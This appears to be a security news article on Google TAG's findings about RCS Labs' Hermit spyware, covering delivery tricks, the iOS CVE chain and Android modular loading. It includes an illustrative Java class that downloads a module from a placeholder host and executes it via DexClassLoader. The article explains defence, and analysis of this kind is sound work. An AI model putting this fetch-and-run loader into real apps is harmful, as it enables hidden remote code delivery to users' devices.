Google’s Threat Analysis Group (TAG) has caught Italian spyware vendor RCS Labs targeting Android and iOS users in Italy and Kazakhstan, with the help of some ISPs and commercial surveillance tooling.
According to the report, TAG believes that in some cases ISPs worked with the threat actors to disable the target’s mobile data connectivity. Once connectivity was cut, the attackers sent the target a malicious link pointing to externally hosted apps disguised as legitimate carrier apps, which, once installed, infected the device.
When the attackers could not work directly with the target’s ISP, they passed the malicious payload off as a messaging app. These apps were distributed through a fake support page that claimed to help people recover suspended Facebook, Instagram or WhatsApp accounts.
Of the three, only tapping the WhatsApp link installed a malicious app; the other two redirected to the official app pages. Google says the malicious apps downloaded by targets were never present on the Apple App Store or the Google Play Store.
The iOS app used in the attack bundled several exploits to escalate privileges on infected devices and steal data. In total, TAG found the following vulnerabilities being exploited:
- CVE-2018-4344: internally referred to and publicly known as LightSpeed.
- CVE-2019-8605: internally referred to as SockPort2 and publicly known as SockPuppet.
- CVE-2020-3837: internally referred to and publicly known as TimeWaste.
- CVE-2020-9907: internally referred to as AveCesare.
- CVE-2021-30883: internally referred to as Clicked2, marked as being exploited in the wild by Apple in October 2021.
- CVE-2021-30983: internally referred to as Clicked3, patched by Apple in December 2021.
The last two, CVE-2021-30883 and CVE-2021-30983, were zero-day exploits at the time TAG discovered them.
As for the Android payload, the APK did not bundle any exploits, but it could download and execute additional modules at runtime using the DexClassLoader API.
The Android spyware, named Hermit, has been described as “modular surveillanceware”: it hides its capabilities in external packages that are downloaded only after it has been deployed, so the installed APK itself reveals little. A detailed analysis of the spyware has been published by cybersecurity firm Lookout.
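To make the modular-loading point above concrete, here is the generic Android dynamic-code-loading pattern the report describes. This is an added illustration written for this page, not Hermit’s code or anything from TAG’s or Lookout’s analyses; the URL, file name, class name and method name are placeholders, and nothing about the real campaign’s module format or entry points is taken from them.

```java
import android.content.Context;
import dalvik.system.DexClassLoader;

import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.lang.reflect.Method;
import java.net.HttpURLConnection;
import java.net.URL;

// Added illustration of Android dynamic code loading via DexClassLoader.
// This is NOT Hermit's code: the server, file, class and method names below
// are placeholders chosen for the example.
public final class ModuleLoader {

    // Placeholder values; the real campaign's server and entry point are not
    // given on this page.
    private static final String MODULE_URL = "https://example.invalid/module.jar";
    private static final String MODULE_FILE = "module.jar";
    private static final String ENTRY_CLASS = "com.example.module.Entry";
    private static final String ENTRY_METHOD = "run";

    private ModuleLoader() {}

    /**
     * Downloads a secondary .jar/.dex into app-private storage and executes a
     * method from it. None of the classes inside the module exist in the
     * installed APK, so static analysis of the APK alone sees only this loader
     * and a network fetch, not the capabilities the module adds.
     */
    public static Object fetchAndRun(Context ctx) throws Exception {
        // App-private directory: never load code from world-writable storage.
        File moduleDir = ctx.getDir("modules", Context.MODE_PRIVATE);
        File module = new File(moduleDir, MODULE_FILE);
        download(MODULE_URL, module);

        // Android 14 (API 34) refuses to load dynamically delivered code from
        // a writable file, so mark it read-only before handing it to the loader.
        module.setReadOnly();

        // optimizedDirectory is ignored on API 26+, but must still be an
        // app-private path on older releases; the code cache dir is conventional.
        DexClassLoader loader = new DexClassLoader(
                module.getAbsolutePath(),
                ctx.getCodeCacheDir().getAbsolutePath(),
                null,                      // no native library search path
                ctx.getClassLoader());     // parent: the app's own class loader

        // Resolve the entry point by name and call it reflectively, so the
        // class never has to exist at compile time.
        Class<?> entry = loader.loadClass(ENTRY_CLASS);
        Method run = entry.getMethod(ENTRY_METHOD, Context.class);
        return run.invoke(null, ctx);
    }

    // Plain HTTP(S) fetch to a file; error handling kept minimal for clarity.
    private static void download(String url, File dest) throws Exception {
        HttpURLConnection conn = (HttpURLConnection) new URL(url).openConnection();
        try (InputStream in = conn.getInputStream();
             FileOutputStream out = new FileOutputStream(dest)) {
            byte[] buf = new byte[8192];
            int n;
            while ((n = in.read(buf)) != -1) {
                out.write(buf, 0, n);
            }
        } finally {
            conn.disconnect();
        }
    }
}
```

Two practical notes follow from this. First, a reference to `dalvik/system/DexClassLoader` in an APK is not an indicator of compromise on its own: legitimate plugin and hot-update frameworks use exactly the same call, so analysts have to obtain and inspect the downloaded modules (as Lookout did) rather than judge the dropper alone. Second, because the capabilities live on the server side, taking down the delivery and control infrastructure, as Google did with the campaign’s Firebase projects, neuters already-installed droppers that have not yet fetched their modules.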
Google says it has notified impacted Android users, pushed changes to Google Play Protect and disabled all Firebase projects the campaign was using as command-and-control infrastructure.